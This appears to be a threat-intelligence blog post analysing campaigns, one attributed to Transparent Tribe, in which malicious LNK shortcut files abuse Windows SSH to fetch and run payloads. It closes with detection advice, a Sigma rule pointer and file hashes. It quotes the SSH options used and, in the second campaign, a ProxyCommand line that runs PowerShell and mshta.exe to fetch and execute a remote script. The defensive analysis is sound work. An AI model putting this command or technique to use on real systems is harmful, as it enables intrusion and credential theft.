Cyble - Transparent Tribe

Overview

Starting this year, Cyble Research and Intelligence Labs (CRIL) has observed a significant trend where threat actors (TAs) have increasingly leveraged LNK files as an initial infection vector in multiple campaigns. These malicious shortcut files, often disguised as legitimate documents, have become a preferred entry point for attackers seeking to compromise systems. This shift in tactics aims to bypass traditional security mechanisms and deceive users into executing the malicious LNK file, thereby initiating a multi-stage cyber attack to deploy the final payload.

In these campaigns, the LNK files are meticulously crafted to execute commands using multiple Living-off-the-Land Binaries (LOLBins). By exploiting the inherent functionalities of these binaries, attackers can download or execute additional malicious components, thereby advancing their attack chain.

While modern endpoint detection and response (EDR) solutions have evolved to detect such activities by monitoring the behavior of LNK files and flagging suspicious use of known LOLBin binaries, this has led TAs to refine their techniques to bypass these advanced security measures.

Recently, CRIL uncovered an additional layer of sophistication in these attacks: the use of SSH commands within malicious LNK files to execute a range of malicious activities. This emerging technique highlights how threat actors leverage SSH commands to maintain persistence and control over compromised systems.

While the malicious use of SSH is not a new tactic, its ongoing relevance as an evasion technique underscores the need for continuous vigilance in monitoring trusted utilities for anomalous behavior.

Pivoting on the identified SSH abuse techniques, CRIL has tracked several campaigns where SSH commands were exploited to carry out malicious operations, further emphasizing the evolution of attack methods. Notably, APT groups have also incorporated this technique into their arsenal, highlighting their growing use in sophisticated cyber campaigns.

SSH using the SCP command

In this campaign, a malicious .LNK file is configured to execute SSH commands that use the scp (Secure Copy Protocol) command to download a malicious file and execute it on the local system. The image below illustrates the contents of the .LNK file.

Figure 1 – Contents of the .LNK file

The use of SSH commands and SCP on Windows systems is relatively less, which may allow malicious activity to go undetected by traditional security solutions that are not specifically configured to monitor such behavior.

The .LNK file is configured with the following SSH options to facilitate the attack:

  • -o “PermitLocalCommand=yes”: Allows the execution of a local command once the SSH connection is established.

  • -o “StrictHostKeyChecking=no”: Disables host key verification, bypassing prompts or errors when connecting to untrusted servers.

Once the SSH connection is established, the SSH client executes the SCP command:

This command downloads a malicious file named christmas-sale.exe from the /home/revenge directory on the remote server to the local directory c:userspublic. The downloaded file is then executed, advancing the attack chain.

Abuse of SSH and PowerShell Commands

In this campaign, a malicious .LNK file is configured to execute an SSH command that indirectly runs a malicious PowerShell command. The .LNK file utilizes a ProxyCommand option in the SSH command to execute PowerShell, which then invokes mshta.exe to access a remote malicious URL. The execution of this command allows the attacker to download and execute a potentially harmful payload on the local system. The image below shows the contents of the .LNK file.

Figure 2 – Contents of the .LNK File

The .LNK file is configured with the following SSH options:

  • -o ProxyCommand=”powershell powershell -Command (‘mshta.exe https://www.google.ca/amp/s/goo.su/IwPQJP’

The SSH client executes the PowerShell command, which runs mshta.exe to fetch and execute the malicious script from the specified URL.

Abuse of SSH and CMD Commands

In this campaign, a malicious .LNK file is crafted to execute an SSH command, which then triggers rundll32 to load a malicious DLL and launch a PDF file (lure document), both located in the current directory. The image below illustrates the contents of the .LNK file.

Figure 3 – Contents of the LNK file

The SSH client executes cmd.exe, which in turn launches the rundll32 utility to load the malicious DLL and execute the PDF, advancing the attack chain.

By analyzing the artifacts and DLL payload associated with this campaign, we observed behavior resembling stealer malware compiled in Go, which we previously discussed in a blog targeting the Indian Air Force. Additionally, another article highlights similar behavior, attributing the stealer payload (HackBrowserData—an open-source tool) to the APT group ‘Transparent Tribe’.

Conclusion

The combination of LNK files and SSH commands has emerged as a notable trend in recent campaigns, signaling a shift in the tactics used by threat actors. By leveraging SSH commands in conjunction with various LOLBins, attackers can establish connections to remote servers, download payloads, and maintain persistence on compromised systems. As demonstrated in the analyzed campaigns, these techniques are continuously evolving, with threat actors refining their methods to evade detection by exploiting trusted system utilities. As the cyber threat landscape progresses, organizations must remain vigilant and adapt their security strategies to effectively counter these increasingly sophisticated attack vectors.

The Sigma rule to detect these campaigns leveraging SSH commands is available for download from the GitHub repository. 

Recommendations

  • To mitigate potential SSH abuse, closely monitor the activities of the legitimate SSH utility, restrict its usage to authorized users, and implement robust detection mechanisms to identify suspicious activities involving ssh.exe, particularly those with abnormal or malicious command-line parameters.

  • Disable OpenSSH features on systems where it is not required.

Indicators of Compromise (IoCs)

Indicators Indicator Type Description
8bd210b33340ee5cdd9031370eed472fcc7cae566752e39408f699644daf8494 SHA-256 Lnk file – Campaign 1
5b6dc2ecb0f7f2e1ed759199822cb56f5b7bd993f3ef3dab0744c6746c952e36 SHA-256 Lnk file – Campaign 2
0016e1ec6fc56e4214e7d54eb7ab3d84a4a83b4befd856e984d77d6db8fc221d SHA-256 Lnk file – Campaign 3

References

https://redsiege.com/blog/2024/04/sshishing-abusing-shortcut-files-and-the-windows-ssh-client-for-initial-access/

https://blogs.blackberry.com/en/2024/05/transparent-tribe-targets-indian-government-defense-and-aerospace-sectors

https://blog.eclecticiq.com/operation-flightnight-indian-government-entities-and-energy-sector-targeted-by-cyber-espionage-campaign

The post LNK Files and SSH Commands: A Stealthy Playbook for Advanced Cyber Attacks appeared first on Cyble.